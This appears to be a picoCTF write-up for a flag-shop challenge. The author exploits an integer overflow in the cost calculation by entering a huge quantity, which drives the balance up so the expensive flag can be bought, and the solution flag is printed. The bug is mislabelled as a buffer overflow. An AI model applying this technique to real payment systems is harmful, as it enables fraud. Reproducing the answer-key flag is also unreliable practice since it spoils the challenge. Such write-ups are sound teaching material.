Author: Danny

# Description

There's a flag shop selling stuff, can you buy a flag? [Source](https://jupiter.challenges.picoctf.org/static/253c4651d852ac6342752ff222cf2a83/store.c). Connect with `nc jupiter.challenges.picoctf.org 9745`.

Look's like we have a source code and a server. Let's play around the server first.

```bash
 Enter a menu selection
2
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
2
1337 flags cost 100000 dollars, and we only have 1 in stock
Enter 1 to buy one
1

Not enough funds for transaction
```
Looks like we don't have enough money to buy the 1337 flag. 
Let's check out the source code.

Something caught my eye.
```c
 if(number_flags > 0){
                    int total_cost = 0;
                    total_cost = 900*number_flags;
                    printf("\nThe final cost is: %d\n", total_cost);

```
What if we give it a very huge number. A buffer overflow attack.
Let's try and give it a huge number. You could script this with Python to make it send  a number but I decided to try and error till it overflows.
```bash
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
1
These knockoff Flags cost 900 each, enter desired quantity
5555555

The final cost is: 705032204
Not enough funds to complete purchase
Welcome to the flag exchange
We sell flags

1. Check Account Balance

2. Buy Flags

3. Exit

 Enter a menu selection
2
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
1
These knockoff Flags cost 900 each, enter desired quantity
55555555

The final cost is: -1539608052
Your current balance after transaction: 1539609152

```
Now we can buy that 1337 flag.
```txt
YOUR FLAG IS: picoCTF{m0n3y_bag5_65d67a74}
```